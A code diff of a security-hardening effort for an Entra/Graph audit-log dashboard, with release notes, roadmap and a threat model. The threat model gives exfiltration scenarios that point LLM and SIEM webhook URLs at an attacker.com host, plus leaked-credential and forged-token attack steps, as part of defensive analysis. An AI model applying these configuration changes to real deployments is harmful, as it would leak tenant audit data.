+- [ ] Set `LLM_ALLOWED_DOMAINS` if using AI features to prevent data exfiltration
+- [ ] Set `SIEM_ALLOWED_DOMAINS` if using SIEM forwarding
+- [ ] Review `METRICS_ALLOWED_IPS` (defaults to private networks + loopback)
+- [ ] Consider Azure Key Vault instead of `.env` for secrets
+- [ ] Review the threat model: `THREAT_MODEL_v1.7.13.md`
+
 ## Run with Docker Compose (recommended)
 ```bash
 docker compose up --build
@@ -76,7 +112,7 @@ uvicorn main:app --reload --host 0.0.0.0 --port 8000

 ## API
 - `GET /health` — health check with MongoDB connectivity status.
- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors.
+- `GET /metrics` — Prometheus metrics for request latency, fetch volume, and errors (IP-restricted).
 - `GET /api/version` — running version (baked into the Docker image at build time).
 - `GET /api/fetch-audit-logs` — pulls the last 7 days by default (override with `?hours=N`, capped to 30 days) of:
  - Entra directory audit logs (`/auditLogs/directoryAudits`)
@@ -171,7 +207,7 @@ curl http://localhost:8000/api/fetch-audit-logs
 - Visit the UI at http://localhost:8000 to filter by user/service/action/result/time, search raw text, paginate, and view raw events.

 ## Maintenance (Dockerized)
-Use the backend image so you don’t need a local venv:
+Use the backend image so you don't need a local venv:
 ```bash
 # ensure Mongo + backend network are up
 docker compose up -d mongo
@@ -182,10 +218,15 @@ docker compose run --rm backend python maintenance.py dedupe
 ```
 Omit `--limit` to process all events. You can also run commands inside a running backend container with `docker compose exec backend ...`.

+## Security Documentation
+- `PEN_TEST_REPORT_v1.7.11.md` — Penetration test findings and remediation
+- `THREAT_MODEL_v1.7.13.md` — Comprehensive threat model covering Entra application abuse, token handling, data exfiltration vectors
+
 ## Notes / Troubleshooting
 - Ensure `TENANT_ID`, `CLIENT_ID`, and `CLIENT_SECRET` match an app registration with `AuditLog.Read.All` (application) permission and admin consent.
 - Additional permissions: Office 365 Management Activity (`ActivityFeed.Read`), and Intune audit (`DeviceManagementConfiguration.Read.All`).
- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set).
+- Auth: if `AUTH_ENABLED=true`, issued tokens must be from `AUTH_TENANT_ID`, audience = `AUTH_CLIENT_ID`; access is granted if roles or groups overlap `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` (if set). A startup warning is logged if auth is enabled but no roles/groups are configured.
 - Backfill limits: Management Activity API typically exposes ~7 days of history via API (longer if your tenant has extended/Advanced Audit retention). Directory/Intune audit retention follows your tenant policy (commonly 30–90 days, longer with Advanced Audit).
 - If you change Mongo credentials/ports, update `MONGO_URI` in `.env` (Docker Compose passes it through to the backend).
 - The service uses the `micro_soc` database and `events` collection by default; adjust in `backend/config.py` if needed.
+- If using Azure Key Vault, ensure the runtime identity (managed identity, service principal, or local Azure CLI) has `Get` permission on secrets.
--- a/RELEASE_NOTES_v1.7.12.md
+++ b/RELEASE_NOTES_v1.7.12.md
@@ -0,0 +1,43 @@
+# AOC v1.7.12 Release Notes
+
+**Release Date:** 2026-04-27
+
+## Security Hardening (Penetration Test Remediation)
+
+This release addresses all findings from the internal soft penetration test of v1.7.11.
+
+### Critical Fix: CORS Credentials Leak
+- **Issue:** When `AUTH_ENABLED=true` and `CORS_ORIGINS="*"`, the CORS middleware reflected any origin with `Access-Control-Allow-Credentials: true`, allowing cross-origin authenticated requests from attacker-controlled domains.
+- **Fix:** When auth is enabled with a wildcard origin, `allow_credentials` is now forced to `False`. CORS still works for unauthenticated requests, but bearer tokens cannot be leaked cross-origin.
+
+### High Fix: Missing Security Headers
+- Added `X-Content-Type-Options: nosniff`
+- Added `X-Frame-Options: DENY`
+- Added `Referrer-Policy: strict-origin-when-cross-origin`
+- Added `Permissions-Policy` restricting browser features (accelerometer, camera, geolocation, gyroscope, magnetometer, microphone, payment, USB)
+
+### Medium Fixes
+- **Rate limiter fail-closed:** Previously, a Redis outage silently disabled all rate limiting. The rate limiter now returns `429` when Redis is unreachable.
+- **OpenAPI docs exposure:** `/docs`, `/redoc`, and `/openapi.json` are disabled by default. Set `DOCS_ENABLED=true` to re-enable (intended for development only).
+
+### Low Fixes
+- **Information disclosure:** `/api/config/auth` no longer leaks `tenant_id` and `client_id` when `auth_enabled=false`.
+- **Webhook validation token:** Added length cap (1024 chars) and ASCII-only validation before echoing `validationToken`. Response now includes `X-Content-Type-Options: nosniff`.
+
+## Files Changed
+
+| File | Change |
+|------|--------|
+| `backend/main.py` | CORS fix, security headers middleware, conditional OpenAPI docs |
+| `backend/config.py` | Added `DOCS_ENABLED` setting |
+| `backend/rate_limiter.py` | Fail-closed on Redis errors |
+| `backend/routes/config.py` | Hide tenant/client IDs when auth disabled |
+| `backend/routes/webhooks.py` | Validate validationToken before echo |
+| `backend/tests/conftest.py` | Enhanced FakeRedis mock with `incr`/`expire` |
+| `.env.example` | Documented `DOCS_ENABLED` |
+| `VERSION` | Bumped to 1.7.12 |
+
+## Test Results
+
+- **80/80 pytest tests passing**
+- Penetration test report: `PEN_TEST_REPORT_v1.7.11.md`
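
The webhook validation token check described in the v1.7.12 notes (length cap of 1024 characters, ASCII-only) could look roughly like the sketch below. The function name `is_safe_validation_token` is hypothetical, and two details are assumptions beyond what the notes state: empty tokens are rejected, and "ASCII-only" is narrowed to printable ASCII so that CR/LF are refused as well. The actual code in `backend/routes/webhooks.py` may differ.

```python
MAX_TOKEN_LENGTH = 1024  # length cap stated in the release notes


def is_safe_validation_token(token: str) -> bool:
    """Return True only for non-empty, printable-ASCII tokens within the cap.

    Hypothetical helper; rejecting empty tokens and control characters is an
    assumption layered on top of the documented "ASCII-only" rule.
    """
    if not token or len(token) > MAX_TOKEN_LENGTH:
        return False
    # Space (0x20) through tilde (0x7E): excludes CR/LF and other control
    # characters, as well as any non-ASCII text.
    return all(" " <= ch <= "~" for ch in token)
```

A handler would echo the token as `text/plain` only when this returns `True` and respond with a 4xx status otherwise.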
--- a/RELEASE_NOTES_v1.7.13.md
+++ b/RELEASE_NOTES_v1.7.13.md
@@ -0,0 +1,34 @@
+# AOC v1.7.13 Release Notes
+
+**Release Date:** 2026-04-27
+
+## Security Hardening: Alpine.js CSP Build
+
+This release removes `unsafe-eval` from the Content-Security-Policy by switching the frontend to Alpine.js's CSP-compatible build.
+
+### Changes
+
+- **Frontend:** Switched from `alpinejs@3.x.x/dist/cdn.min.js` to `alpinejs@3.x.x/dist/csp.min.js`
+- **Frontend:** Added explicit `Alpine.start()` call on `DOMContentLoaded` (required by CSP build)
+- **Backend CSP:** Removed `'unsafe-eval'` from `script-src` directive
+
+### Why this matters
+
+The previous v1.7.11–1.7.12 releases included `'unsafe-eval'` in the CSP because the standard Alpine.js CDN build uses `new Function()` internally for reactive expression evaluation. The CSP build eliminates this requirement, further hardening the application against XSS and injection attacks.
+
+### Compatibility
+
+All existing Alpine.js directives (`x-data`, `x-init`, `x-show`, `x-text`, `x-for`, `x-if`, `x-model`, event handlers) continue to work unchanged. The CSP build uses a safe expression evaluator that produces identical behavior without `eval`/`new Function`.
+
+## Files Changed
+
+| File | Change |
+|------|--------|
+| `backend/frontend/index.html` | Alpine.js src → `csp.min.js`; added `Alpine.start()` |
+| `backend/main.py` | Removed `'unsafe-eval'` from `script-src` CSP |
+| `VERSION` | Bumped to 1.7.13 |
+
+## Test Results
+
+- **80/80 pytest tests passing**
+- Ruff lint/format clean
--- a/RELEASE_NOTES_v1.7.14.md
+++ b/RELEASE_NOTES_v1.7.14.md
@@ -0,0 +1,64 @@
+# AOC v1.7.14 Release Notes
+
+**Release Date:** 2026-04-27
+
+## Security Hardening: Threat Model Remediation
+
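+This release addresses the high-severity findings from the v1.7.13 threat model review, along with two medium-severity ones (CDN scripts without SRI and role gating that defaults to allow-all).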
+
+### LLM Endpoint Domain Allowlist
+
+- **New config:** `LLM_ALLOWED_DOMAINS` (comma-separated, supports wildcards like `*.openai.azure.com`)
+- **Behavior:** When configured, the `/api/ask` endpoint rejects `LLM_BASE_URL` domains not in the allowlist
+- **Impact:** Prevents audit data exfiltration via a compromised or attacker-controlled LLM endpoint
+
+### SIEM Webhook SSRF Guard
+
+- **New config:** `SIEM_ALLOWED_DOMAINS` (comma-separated)
+- **Behavior:** The SIEM forwarder now validates `SIEM_WEBHOOK_URL` with the same SSRF checks as the LLM endpoint (HTTPS-only, blocks private IPs, enforces domain allowlist)
+- **Impact:** Prevents real-time audit data exfiltration via a malicious SIEM webhook URL
+
+### CDN Subresource Integrity (SRI)
+
+- Added `integrity` hashes to both CDN scripts in the frontend:
+  - Alpine.js 3.15.11: `sha384-WPtu0YHhJ3arcykfnv1JgUffWDSKRnqnDeTpJUbOc2os2moEmLkIdaeR0trPN4be`
+  - MSAL.js 2.37.0: `sha384-DUSOaqAzlZRiZxkDi8hL7hXJDZ+X39ZOAYV9ZDx44gUv9pozmcunJH02tjSFLPnW`
+- **Impact:** The browser refuses to execute a CDN script whose content doesn't match the hash, so a tampered file served by a compromised CDN cannot run
+
+### Auth Misconfiguration Warning
+
+- At startup, AOC now logs a `WARNING` if `AUTH_ENABLED=true` but neither `AUTH_ALLOWED_ROLES` nor `AUTH_ALLOWED_GROUPS` is configured
+- **Impact:** Operators are alerted when the app is accidentally left open to all Entra users
+
+### Azure Key Vault Integration (Optional)
+
+- **New module:** `backend/secrets_manager.py`
+- **New config:** `AZURE_KEY_VAULT_NAME`
+- **Behavior:** If `AZURE_KEY_VAULT_NAME` is set, AOC fetches these secrets from Key Vault at startup:
+  - `aoc-client-secret` → `CLIENT_SECRET`
+  - `aoc-llm-api-key` → `LLM_API_KEY`
+  - `aoc-mongo-uri` → `MONGO_URI`
+  - `aoc-webhook-client-secret` → `WEBHOOK_CLIENT_SECRET`
+- Falls back silently to `.env` / environment variables when Key Vault is not configured
+- **Dependencies:** `azure-identity` and `azure-keyvault-secrets` (commented out in `requirements.txt` — uncomment when using Key Vault)
+- **Impact:** Lets operators keep long-lived secrets out of `.env` files and Docker images
+
+## Files Changed
+
+| File | Change |
+|------|--------|
+| `backend/config.py` | Added `LLM_ALLOWED_DOMAINS`, `SIEM_ALLOWED_DOMAINS`, `AZURE_KEY_VAULT_NAME` |
+| `backend/routes/ask.py` | Domain allowlist enforcement for LLM URL |
+| `backend/siem.py` | SSRF guard + domain allowlist for SIEM webhook |
+| `backend/frontend/index.html` | SRI hashes for Alpine.js and MSAL.js |
+| `backend/main.py` | Startup warning for auth misconfiguration |
+| `backend/secrets_manager.py` | New — Azure Key Vault integration |
+| `backend/requirements.txt` | Added optional Azure Key Vault packages |
+| `.env.example` | Documented new settings |
+| `VERSION` | Bumped to 1.7.14 |
+| `THREAT_MODEL_v1.7.13.md` | Threat model documentation |
+
+## Test Results
+
+- **80/80 pytest tests passing**
+- Ruff lint/format clean
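
The auth misconfiguration warning in the v1.7.14 notes amounts to a small startup check. A minimal sketch follows, assuming the three settings are available as a bool and two lists. The function name `warn_if_auth_open`, the logger name, and the message wording are hypothetical; the real check lives in `backend/main.py` and uses the project's structlog logger.

```python
import logging

logger = logging.getLogger("aoc.startup")  # hypothetical logger name


def warn_if_auth_open(auth_enabled: bool, allowed_roles: list, allowed_groups: list) -> bool:
    """Log a WARNING and return True when auth is on but nothing restricts access."""
    if auth_enabled and not allowed_roles and not allowed_groups:
        logger.warning(
            "AUTH_ENABLED=true but neither AUTH_ALLOWED_ROLES nor "
            "AUTH_ALLOWED_GROUPS is set: every user in the tenant can sign in."
        )
        return True
    return False
```

Returning a bool keeps the check easy to unit-test. The threat model also suggests switching the default to deny-all, which this sketch does not do.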
--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -59,7 +59,7 @@ Goal: evolve from a polling dashboard into a full security operations tool.

 ---

-## Phase 5: Intelligence
+## Phase 5: Intelligence ✅
 Goal: add AI-powered analysis and external tool integration.

 - [x] AI feature flag (`AI_FEATURES_ENABLED`) to gate LLM-dependent features
@@ -76,7 +76,26 @@ UI polish (topbar, footer, clickable pills) in v1.6.1–v1.6.4.

 ---

-## Phase 6: Multi-Tenancy (Premium) ⏸️
+## Phase 6: Security Hardening ✅
+Goal: address penetration test findings and threat model gaps.
+
+- [x] Fix CORS credentials leak (v1.7.12)
+- [x] Add security headers (X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy) (v1.7.12)
+- [x] Make rate limiter fail-closed on Redis failure (v1.7.12)
+- [x] Disable OpenAPI docs by default (v1.7.12)
+- [x] Hide tenant_id/client_id from config endpoint when auth disabled (v1.7.12)
+- [x] Validate webhook validationToken before echo (v1.7.12)
+- [x] Gate `/metrics` behind IP allowlist (v1.7.12)
+- [x] Add LLM domain allowlist (`LLM_ALLOWED_DOMAINS`) (v1.7.14)
+- [x] Add SIEM webhook SSRF guard + domain allowlist (v1.7.14)
+- [x] Add SRI hashes to CDN scripts (v1.7.14)
+- [x] Add startup warning for auth misconfiguration (v1.7.14)
+- [x] Add Azure Key Vault integration for secrets storage (v1.7.14)
+- [x] Internal penetration test + threat model documentation
+
+---
+
+## Phase 7: Multi-Tenancy (Premium) ⏸️
 Goal: allow MSPs to manage multiple client tenants from a single deployment.

 Status: **Planned — not started**. Architecture designed, pending validation of core features (SIEM export, alerting) in production first.
@@ -88,10 +107,10 @@ Status: **Planned — not started**. Architecture designed, pending validation o
 - Super-admin role for MSP staff to access all tenants

 ### Implementation phases
- **Phase 6.1** (2–3 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth
- **Phase 6.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints
- **Phase 6.3** (2 days): Frontend tenant switcher, tenant name display, admin page
- **Phase 6.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode
+- **Phase 7.1** (2–3 days): Tenant model & registry, tenant-aware data layer, per-tenant Graph API auth
+- **Phase 7.2** (1 day): Tenant-scoped API routes, tenant-specific config endpoints
+- **Phase 7.3** (2 days): Frontend tenant switcher, tenant name display, admin page
+- **Phase 7.4** (1 day): License gating — signed JWT `LICENSE_KEY` gates multi-tenant mode

 ### Licensing model
 - Single-tenant: remains MIT/free
--- a/THREAT_MODEL_v1.7.13.md
+++ b/THREAT_MODEL_v1.7.13.md
@@ -0,0 +1,321 @@
+# AOC Threat Model — v1.7.13
+
+**Date:** 2026-04-27
+**Scope:** Entra ID / Microsoft Graph integration, token handling, data flows, external dependencies
+**Assumptions:** Deployment is Docker Compose behind nginx reverse proxy; `AUTH_ENABLED=true`; `AI_FEATURES_ENABLED` may be true or false.
+
+---
+
+## Attack Surface Map
+
+```
+┌─────────────────────────────────────────────────────────────────────────────┐
+│                              ATTACKER                                        │
+│         │                    │                    │                          │
+│         ▼                    ▼                    ▼                          │
+│  ┌─────────────┐    ┌──────────────┐    ┌─────────────────┐                 │
+│  │  Frontend   │    │   API        │    │  Webhook        │                 │
+│  │  (CDN JS)   │    │  (/api/*)    │    │  (/api/webhooks)│                 │
+│  └──────┬──────┘    └──────┬───────┘    └────────┬────────┘                 │
+│         │                  │                      │                          │
+│         ▼                  ▼                      ▼                          │
+│  ┌─────────────────────────────────────────────────────────────┐            │
+│  │                    AOC BACKEND                               │            │
+│  │  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────┐    │            │
+│  │  │  Auth    │  │  Events  │  │  Fetch   │  │  Ask/LLM │    │            │
+│  │  │  (JWT)   │  │  (Mongo) │  │  (Graph) │  │  (HTTP)  │    │            │
+│  │  └────┬─────┘  └────┬─────┘  └────┬─────┘  └────┬─────┘    │            │
+│  │       │             │             │             │           │            │
+│  │       ▼             ▼             ▼             ▼           │            │
+│  │  ┌─────────────────────────────────────────────────────┐    │            │
+│  │  │              SECRETS / CREDENTIALS                   │    │            │
+│  │  │  CLIENT_SECRET  │  LLM_API_KEY  │  MONGO_PASSWORD   │    │            │
+│  │  └─────────────────────────────────────────────────────┘    │            │
+│  └─────────────────────────────────────────────────────────────┘            │
+│         │                  │                      │                          │
+│         ▼                  ▼                      ▼                          │
+│  ┌─────────────┐    ┌──────────────┐    ┌─────────────────┐                 │
+│  │ Microsoft   │    │  LLM API     │    │  SIEM Webhook   │                 │
+│  │  Graph API  │    │  (OpenAI/    │    │  (optional)     │                 │
+│  │             │    │   Azure)     │    │                 │                 │
+│  └─────────────┘    └──────────────┘    └─────────────────┘                 │
+└─────────────────────────────────────────────────────────────────────────────┘
+```
+
+---
+
+## 1. Entra App Registration Abuse — HIGH
+
+### 1.1 Client Credentials Leak = Full Tenant Read
+
+**How it works:**
+- AOC uses `client_credentials` flow (`graph/auth.py`)
+- `CLIENT_ID` + `CLIENT_SECRET` are exchanged for an access token at `login.microsoftonline.com`
+- The token has `https://graph.microsoft.com/.default` scope
+- This grants **all application permissions** configured in the Entra app registration
+
+**Typical permissions:**
+- `Directory.Read.All` — read all users, groups, devices, roles
+- `AuditLog.Read.All` — read all audit logs
+- `DeviceManagementManagedDevices.Read.All` — read all Intune devices
+
+**Attack scenario:**
+1. Attacker gains read access to `.env` or the Docker container filesystem
+2. Attacker calls the token endpoint directly with the leaked `CLIENT_ID`/`CLIENT_SECRET`
+3. Attacker receives a Graph API access token valid for ~1 hour
+4. Attacker can query ALL tenant data independently of AOC
+
+**Impact:** Complete tenant data exfiltration — users, groups, devices, audit logs, mailboxes (if a mail permission such as `Mail.Read` is granted).
+
+**Mitigation in place:** None. The backend needs these permissions to function.
+
+**Recommendation:**
+- Store `CLIENT_SECRET` in a secret manager (Azure Key Vault, HashiCorp Vault) rather than `.env`
+- Use short-lived certificates instead of long-lived secrets for app authentication
+- Monitor Entra sign-in logs for anomalous `client_credentials` token requests
+- Restrict app registration permissions to the absolute minimum (e.g., `AuditLog.Read.All` + `Directory.Read.All` only)
+
+---
+
+### 1.2 No Scope Restriction on Graph Token
+
+**Finding:** `get_access_token()` always requests `https://graph.microsoft.com/.default` — the full permission set. There's no mechanism to request narrower scopes for specific operations.
+
+**Impact:** If the app registration has 10 permissions, every token has all 10. A bug in one code path could expose data from all 10 permission areas.
+
+**Recommendation:** Not easily fixable without splitting into multiple app registrations. Document as accepted risk.
+
+---
+
+## 2. Authentication & Token Validation — MEDIUM
+
+### 2.1 JWKS Fetch Without TLS Certificate Validation Hardening
+
+**Finding:** `_get_jwks()` fetches OIDC configuration and JWKS from `login.microsoftonline.com` using standard `requests` TLS validation. No certificate pinning or CA bundle restriction.
+
+**Attack scenario (advanced):**
+1. Attacker compromises DNS or a network hop between AOC and Microsoft
+2. Attacker serves a fake JWKS endpoint with their own public key
+3. Attacker issues a forged JWT signed with their private key
+4. AOC validates the forged JWT against the attacker's public key
+5. Attacker gains authenticated access
+
+**Likelihood:** Very low (requires DNS compromise or nation-state-level interception).
+
+**Mitigation:** Standard TLS validation is in place. For high-security environments, consider pinning the `login.microsoftonline.com` certificate thumbprint.
+
+---
+
+### 2.2 Missing `nbf` / `iat` Claim Verification
+
+**Finding:** `_decode_token()` verifies `exp`, `tid`, `iss`, and `aud` but does not check `nbf` (not before) or `iat` (issued at) claims.
+
+**Impact:** A token used before its validity period (`nbf`) or with a suspicious future `iat` would be accepted. Minor issue — MSAL tokens are well-formed in practice.
+
+---
+
+### 2.3 Role/Group Gating Defaults to "Allow All"
+
+**Finding:** In `auth.py`:
+```python
+def _allowed(claims, allowed_roles, allowed_groups):
+    if not allowed_roles and not allowed_groups:
+        return True
+```
+
+**Impact:** If `AUTH_ENABLED=true` but `AUTH_ALLOWED_ROLES` and `AUTH_ALLOWED_GROUPS` are left empty (the default), **every Entra user in the tenant** can authenticate and use AOC. This is a common misconfiguration.
+
+**Recommendation:** Add a startup warning when auth is enabled but no roles/groups are configured. Consider changing the default to deny-all.
+
+---
+
+### 2.4 Privacy Service Role Gating Also Defaults to "Allow All"
+
+**Finding:** `user_can_access_privacy_services()` returns `True` if `PRIVACY_SERVICE_ROLES` is empty. If an admin configures `PRIVACY_SERVICES` (e.g., `Exchange`) but forgets to set `PRIVACY_SERVICE_ROLES`, all users see all privacy data.
+
+---
+
+## 3. Data Exfiltration Paths — HIGH
+
+### 3.1 LLM Endpoint as Data Exfiltration Channel
+
+**Finding:** When `AI_FEATURES_ENABLED=true` and `LLM_API_KEY` is set:
+- The `/api/ask` endpoint sends audit event data (actors, targets, operations, summaries) to the configured LLM API
+- `_validate_llm_url()` blocks private IPs but does NOT restrict the domain to an allowlist
+- Any HTTPS URL is accepted
+
+**Attack scenario:**
+1. Attacker gains `.env` write access (or container filesystem access)
+2. Attacker changes `LLM_BASE_URL` to `https://attacker.com/fake-llm`
+3. Attacker sends an `/api/ask` request like "show me all events"
+4. AOC queries MongoDB and sends up to `LLM_MAX_EVENTS` (default 200) events to the attacker's URL
+5. Attacker receives structured audit data including actor names, UPNs, device names, operation details
+
+**Impact:** Up to 200 audit events exfiltrated per API call. With pagination, an attacker could exfiltrate the entire database.
+
+**Mitigation in place:** SSRF guard blocks private IPs and localhost.
+
+**Gap:** No domain allowlist. An attacker-controlled public HTTPS endpoint is accepted.
+
+**Recommendation:**
+- Add `LLM_ALLOWED_DOMAINS` config (e.g., `api.openai.com,*.openai.azure.com`)
+- Validate `LLM_BASE_URL` against this allowlist at startup and on every request
+- Log all LLM requests with event counts sent
+
+---
+
+### 3.2 SIEM Webhook as Real-Time Exfiltration Channel
+
+**Finding:** `siem.py` forwards every normalized event to `SIEM_WEBHOOK_URL` during ingestion:
+```python
+def forward_event(event):
+    if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
+        return
+    requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
+```
+
+**Gap:** No URL validation at all. Unlike the LLM endpoint, the SIEM webhook has NO SSRF guard.
+
+**Attack scenario:**
+1. Attacker sets `SIEM_ENABLED=true` and `SIEM_WEBHOOK_URL=https://attacker.com/collect`
+2. Every new audit event fetched from Graph is immediately POSTed to the attacker's URL
+3. Attacker receives real-time stream of all tenant audit events
+
+**Impact:** Real-time, continuous data exfiltration of all audit events.
+
+**Recommendation:**
+- Add the same SSRF validation to `SIEM_WEBHOOK_URL` that exists for `LLM_BASE_URL`
+- Add `SIEM_ALLOWED_DOMAINS` config
+- Log SIEM forwarding failures prominently
+
+---
+
+### 3.3 Export Features (JSON/CSV)
+
+**Finding:** The frontend has `exportJSON()` and `exportCSV()` functions that download all currently filtered events. These are authenticated but not rate-limited separately from `/api/events`.
+
+**Impact:** A compromised account can export large batches of events. However, this requires authentication and is bounded by the 500-event page size limit.
+
+**Risk level:** LOW — requires valid auth and is noisy.
+
+---
+
+## 4. Webhook Abuse — MEDIUM
+
+### 4.1 Graph Change Notification Webhook
+
+**Finding:** `/api/webhooks/graph` receives Microsoft Graph change notifications:
+- Echoes `validationToken` for subscription handshake
+- Accepts notifications with optional `clientState` validation
+- `WEBHOOK_CLIENT_SECRET` is empty by default
+
+**Attack scenario 1 — Subscription hijacking:**
+1. Attacker discovers the webhook URL (via API enumeration or guess)
+2. Attacker creates a Graph subscription pointing to the AOC webhook URL
+3. Attacker receives change notifications for the subscribed resource
+
+**Mitigation:** Notifications without matching `clientState` are rejected when `WEBHOOK_CLIENT_SECRET` is configured. But it's empty by default.
+
+**Attack scenario 2 — Validation token abuse:**
+1. Attacker sends a POST to `/api/webhooks/graph?validationToken=<arbitrary content>`
+2. AOC echoes the token back as `text/plain`
+3. Could be used for cache poisoning or response splitting
+
+**Mitigation:** Length and ASCII validation added in v1.7.12.
+
+**Recommendation:**
+- Require `WEBHOOK_CLIENT_SECRET` to be set in production
+- Document that the webhook endpoint should NOT be exposed to the public internet
+
+---
+
+## 5. Supply Chain — MEDIUM
+
+### 5.1 CDN Scripts Without Subresource Integrity (SRI)
+
+**Finding:** The frontend loads two external scripts without SRI hashes:
+```html
+<script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
+<script src="https://alcdn.msauth.net/browser/2.37.0/js/msal-browser.min.js" crossorigin="anonymous"></script>
+```
+
+**Attack scenario:**
+1. `cdn.jsdelivr.net` or `alcdn.msauth.net` is compromised (supply chain attack)
+2. Malicious JavaScript is served instead of the legitimate library
+3. Malicious script can steal MSAL tokens, modify API requests, or exfiltrate data
+
+**Impact:** Complete frontend compromise — token theft, data exfiltration, UI spoofing.
+
+**Recommendation:**
+- Add SRI hashes to both script tags:
+  ```html
+  <script defer src="..." integrity="sha384-..." crossorigin="anonymous"></script>
+  ```
+- Or vendor the JS files and serve them from the same origin
+
+---
+
+## 6. Privilege Escalation — MEDIUM
+
+### 6.1 Application Permissions Bypass User Boundaries
+
+**Finding:** Because AOC uses application permissions (not delegated permissions), the backend can read audit logs for ALL users, not just the authenticated user. The privacy service filtering (`PRIVACY_SERVICES`) is the only boundary — and it's opt-in.
+
+**Impact:** A user with minimal Entra permissions (e.g., a regular user who can authenticate) can view audit logs for the entire tenant if:
+- `PRIVACY_SERVICES` is not configured, OR
+- `PRIVACY_SERVICE_ROLES` is not configured
+
+**Recommendation:**
+- Document that AOC should be restricted to admin/security roles via `AUTH_ALLOWED_ROLES`
+- Consider adding per-user event filtering (only show events where the authenticated user is the actor or target)
+
+---
+
+## 7. Miscellaneous Vectors — LOW
+
+### 7.1 Token Cache in Memory
+
+**Finding:** `_TOKEN_CACHE` in `graph/auth.py` is an in-memory dictionary. If an attacker gains code execution in the Python process, they can read the cache or call `get_access_token()` directly.
+
+**Impact:** Attacker with code execution can get Graph API tokens. But if they have code execution, they already have `CLIENT_SECRET` from memory or `.env`.
+
+### 7.2 MongoDB Connection String
+
+**Finding:** `MONGO_URI` contains credentials. If an attacker gains filesystem access, they can connect directly to MongoDB and bypass all AOC auth/privacy controls.
+
+**Mitigation:** MongoDB is internal to Docker network (not exposed to host in production compose file).
+
+### 7.3 Audit Trail Log Injection
+
+**Finding:** `audit_trail.log_action()` stores actions in MongoDB. The `details` dict could contain user-controlled data (e.g., filter values). If the audit log is ever rendered without escaping, this could lead to XSS.
+
+**Risk level:** LOW — audit logs are not currently rendered in the UI.
+
+---
+
+## Risk Summary
+
+| Vector | Severity | Likelihood | Requires |
+|--------|----------|------------|----------|
+| Client secret leak → full tenant read | **HIGH** | Medium | `.env` or container access |
+| LLM endpoint hijacking → data exfil | **HIGH** | Low | `.env` write access |
+| SIEM webhook hijacking → real-time exfil | **HIGH** | Low | `.env` write access |
+| CDN compromise → frontend token theft | **MEDIUM** | Low | Supply chain attack |
+| Role gating misconfig → all users access | **MEDIUM** | High | Misconfiguration |
+| Webhook subscription hijacking | **MEDIUM** | Low | URL discovery |
+| DNS compromise → fake JWKS | **MEDIUM** | Very low | Network compromise |
+| Application permissions bypass boundaries | **MEDIUM** | High | Default config |
+| Token replay | LOW | Low | Token theft |
+| Audit log injection | LOW | Low | Filter manipulation |
+
+---
+
+## Immediate Recommendations
+
+1. **Add LLM domain allowlist** (`LLM_ALLOWED_DOMAINS`) and validate at startup
+2. **Add SIEM SSRF guard** — reuse `_validate_llm_url()` for `SIEM_WEBHOOK_URL`
+3. **Add SRI hashes** to CDN script tags, or vendor the libraries
+4. **Add startup warning** when auth is enabled but no `AUTH_ALLOWED_ROLES`/`AUTH_ALLOWED_GROUPS` configured
+5. **Document webhook security** — require `WEBHOOK_CLIENT_SECRET` in production
+6. **Consider Key Vault integration** for `CLIENT_SECRET` and `LLM_API_KEY`
+7. **Add per-user filtering option** — restrict events to those involving the authenticated user
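
Recommendations 1 and 2 above (a domain allowlist plus an SSRF guard shared by the LLM and SIEM URLs) can be sketched with the standard library alone. The names `host_matches` and `is_url_allowed` are hypothetical and this is not the project's `_validate_llm_url()`. Two assumptions to note: an empty allowlist means "no domain restriction" (matching the empty-string default in `config.py`), and only IP literals are checked. A hostname that resolves to a private address would need an additional DNS check.

```python
import ipaddress
from urllib.parse import urlparse


def host_matches(host: str, pattern: str) -> bool:
    """Match a hostname against an exact domain or a '*.suffix' wildcard."""
    host, pattern = host.lower().rstrip("."), pattern.lower()
    if pattern.startswith("*."):
        suffix = pattern[1:]  # '*.example.com' -> '.example.com'
        # Require at least one label before the suffix, so 'example.com'
        # and 'evilexample.com' do not match '*.example.com'.
        return host.endswith(suffix) and len(host) > len(suffix)
    return host == pattern


def is_url_allowed(url: str, allowed_domains: list) -> bool:
    """True if the URL is HTTPS, not a private/loopback target, and allowlisted."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    if parsed.scheme != "https" or not host or host == "localhost":
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None  # not an IP literal; treated as a DNS name (not resolved here)
    if addr is not None and (addr.is_private or addr.is_loopback or addr.is_link_local):
        return False
    if allowed_domains:
        return any(host_matches(host, p) for p in allowed_domains)
    return True  # assumption: empty allowlist means no domain restriction
```

With `["api.openai.com", "*.openai.azure.com"]` as the allowlist, `https://attacker.com/fake-llm` from the scenario in section 3.1 is rejected, while an Azure OpenAI resource hostname is accepted.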
--- a/2
+++ b/2
@@ -1 +1 @@
-1.7.7
+1.7.14
--- a/backend/config.py
+++ b/backend/config.py
@@ -1,4 +1,10 @@
-from pydantic_settings import BaseSettings, SettingsConfigDict
+from secrets_manager import load_key_vault_secrets
+
+# Pre-load Azure Key Vault secrets into os.environ before pydantic-settings reads them.
+# This is a no-op if AZURE_KEY_VAULT_NAME is not set.
+load_key_vault_secrets()
+
+from pydantic_settings import BaseSettings, SettingsConfigDict  # noqa: E402


 class Settings(BaseSettings):
@@ -76,6 +82,19 @@ class Settings(BaseSettings):
    RATE_LIMIT_REQUESTS: int = 120
    RATE_LIMIT_WINDOW_SECONDS: int = 60

+    # Security / docs exposure
+    DOCS_ENABLED: bool = False
+    METRICS_ALLOWED_IPS: str = "127.0.0.1,::1,10.0.0.0/8,172.16.0.0/12,192.168.0.0/16"
+
